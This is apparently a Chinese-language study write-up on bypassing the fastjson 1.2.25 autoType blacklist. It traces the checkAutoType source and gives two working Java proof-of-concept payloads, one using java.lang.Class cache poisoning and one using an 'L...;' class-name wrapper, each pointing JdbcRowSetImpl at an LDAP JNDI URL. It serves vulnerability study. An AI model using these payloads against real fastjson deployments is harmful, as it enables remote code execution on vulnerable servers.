参考视频：fastjson反序列化漏洞3-<=1.2.47绕过_哔哩哔哩_bilibili

分析版本

fastjson1.2.24

JDK 8u141

分析流程

分析fastjson1.2.25更新的源码，用JsonBcel链跟进

先看修改的地方

fastjson1.2.24

if (key == JSON.DEFAULT_TYPE_KEY && !lexer.isEnabled(Feature.DisableSpecialKeyDetect)) {String typeName = lexer.scanSymbol(symbolTable, '"');Class<?> clazz = TypeUtils.loadClass(typeName, config.getDefaultClassLoader());

fastjson1.2.25

if (key == JSON.DEFAULT_TYPE_KEY && !lexer.isEnabled(Feature.DisableSpecialKeyDetect)) {String typeName = lexer.scanSymbol(symbolTable, '"');Class<?> clazz = config.checkAutoType(typeName, null);

可以看到loadClass的方法，被替换了，主要的安全逻辑就在替换的方法里，跟进看替换的方法Class<?> clazz = config.checkAutoType(typeName, null);

里面是很多if语句，黑白名单判断（分析写在注释）

public Class<?> checkAutoType(String typeName, Class<?> expectClass) {if (typeName == null) {return null;}final String className = typeName.replace('$', '.'); //替换下内部类符号if (autoTypeSupport || expectClass != null) {    //autoTypeSupport默认false，expectClass默认null，这个判断默认为falsefor (int i = 0; i < acceptList.length; ++i) {String accept = acceptList[i];     //白名单默认为空if (className.startsWith(accept)) {return TypeUtils.loadClass(typeName, defaultClassLoader);}}for (int i = 0; i < denyList.length; ++i) {String deny = denyList[i];    //黑名单，可以自己debug看看if (className.startsWith(deny)) {throw new JSONException("autoType is not support. " + typeName);}}}Class<?> clazz = TypeUtils.getClassFromMapping(typeName);//先在缓存中查找if (clazz == null) {clazz = deserializers.findClass(typeName);//缓存没有在已有的反序列化器中查找}if (clazz != null) { //找到类进入次判断if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { //做个判断throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());}return clazz;}if (!autoTypeSupport) {//autoTypeSupport为truefor (int i = 0; i < denyList.length; ++i) {String deny = denyList[i];if (className.startsWith(deny)) {throw new JSONException("autoType is not support. " + typeName);}}for (int i = 0; i < acceptList.length; ++i) {String accept = acceptList[i];if (className.startsWith(accept)) {clazz = TypeUtils.loadClass(typeName, defaultClassLoader);if (expectClass != null && expectClass.isAssignableFrom(clazz)) {throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());}return clazz;}}}if (autoTypeSupport || expectClass != null) {clazz = TypeUtils.loadClass(typeName, defaultClassLoader);}if (clazz != null) {if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger|| DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver) {throw new JSONException("autoType is not support. " + typeName);}if (expectClass != null) {if (expectClass.isAssignableFrom(clazz)) {return clazz;} else {throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());}}}if (!autoTypeSupport) {throw new JSONException("autoType is not support. " + typeName);}return clazz;
}

关于checkAutoType方法的流程图，我放在我的github上了Java反序列化学习 有帮助的话大家可以star一下

我在图中return的位置都拿绿色标记了，很明显我们要绕过检测必须控制流程走到return处。

攻击实现

autoTypeSupport参数为false

autoTypeSupport参数和白名单我们无法控制的条件下，我们发现只剩一个缓存加载的绕过方式了。下面看下能否利用。

发现缓存表mapping的put方式有两个位置，第一个位置很明显在初始化时被调用写入的缓存。

看第二个位置能否利用，是在loadClass里面，我们可以看到这个loadClass用法就是，在缓存中没找到的类加载时把这个类加进缓存中。

我们如果可以控制传参，并调用loadClass就可以把恶意类加入缓存中。之后继续找loadClass的调用

只有一处可能有利用点的地方，就是在MiscCodec下面，而MiscCodec继承了ObjectSerializer, ObjectDeserializer是个反序列化器。

if (clazz == Class.class) {return (T) TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader());
}

而MiscCodec的利用就是在加载默认的反序列化器时，Class的反序列化器也是它。

deserializers.put(Class.class, MiscCodec.instance);

所以绕过思路有了，我们先反序列化一个Class，它的值为恶意类，之后再反序列化恶意类。

写payload时，要注意传值，让程序执行到我们要调用的位置。

return (T) TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader());这里strVal是我们要传的恶意类名，看下怎么赋值的。

//MiscCodec#deserialze
if (parser.resolveStatus == DefaultJSONParser.TypeNameRedirect) {parser.resolveStatus = DefaultJSONParser.NONE;parser.accept(JSONToken.COMMA);if (lexer.token() == JSONToken.LITERAL_STRING) {if (!"val".equals(lexer.stringVal())) {           //注意这里不能抛出异常，如果抛出异常程序就走不到loadClass处了，所以我们传入的属性名应为valthrow new JSONException("syntax error");}lexer.nextToken();} else {throw new JSONException("syntax error");}parser.accept(JSONToken.COLON);objVal = parser.parse();parser.accept(JSONToken.RBRACE);
} else {objVal = parser.parse();
}

下面就能写出payload了

public class FastJsonBypass1 {public static void main(String[] args) throws Exception {String s = "{{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:10389/cn=Exp,dc=example,dc=com\",\"autoCommit\":0}}";JSONObject jsonObject = JSON.parseObject(s);}
}

跟一下利用流程

先看Class的反序列化

//ParserConfig#checkAutoType
Class<?> clazz = TypeUtils.getClassFromMapping(typeName);   //在缓存中找不到
if (clazz == null) {clazz = deserializers.findClass(typeName);              //可以找到反序列化器，也就是MiscCodec，返回Class
}if (clazz != null) {                                        //进入此循环if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { //期望类为空，不进入此循环throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());}return clazz;   //返回Class
}

之后return调用

//defaultJSONParser#parseObject
ObjectDeserializer deserializer = config.getDeserializer(clazz);  //调用返回MiscCodec反序列化器
return deserializer.deserialze(this, clazz, fieldName); //MiscCodec.deserialze

MiscCodec.deserialze把传入的String（也就是com.sun.rowset.JdbcRowSetImpl），反序列化为Class对象

lexer.stringVal()==val

再往下走到

if (clazz == Class.class) {return (T) TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader());  //loadClass（com.sun.rowset.JdbcRowSetImpl），并存入缓存
}

之后回到

//defaultJSONParser#parseObject
return deserializer.deserialze(this, clazz, fieldName);  //MiscCodec.deserialze

之后进入下一轮循环，也就是反序列化com.sun.rowset.JdbcRowSetImpl

就不在这写了，下面流程在 fastjson-流程分析中写过了。

autoTypeSupport参数为true

如果autoTypeSupport开启的情况下，跟进流程图可以看到先过黑白名单之后才加载和返回类。

在上面分析时，我们也能注意到，在loadClass中有对传入类名的处理，对数组类进行处理，把L，;，[，直接去掉后加载，这里绕过黑名单很容易。

public static Class<?> loadClass(String className, ClassLoader classLoader) {if (className == null || className.length() == 0) {return null;}Class<?> clazz = mappings.get(className);if (clazz != null) {return clazz;}if (className.charAt(0) == '[') {Class<?> componentType = loadClass(className.substring(1), classLoader);return Array.newInstance(componentType, 0).getClass();}if (className.startsWith("L") && className.endsWith(";")) {String newClassName = className.substring(1, className.length() - 1);return loadClass(newClassName, classLoader);}

payload

public class FastJsonBypass1 {public static void main(String[] args) throws Exception {ParserConfig.getGlobalInstance().setAutoTypeSupport(true);   //开启autoTypeSupport参数String s = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"ldap://localhost:10389/cn=Exp,dc=example,dc=com\",\"autoCommit\":0}";JSONObject jsonObject = JSON.parseObject(s);}
}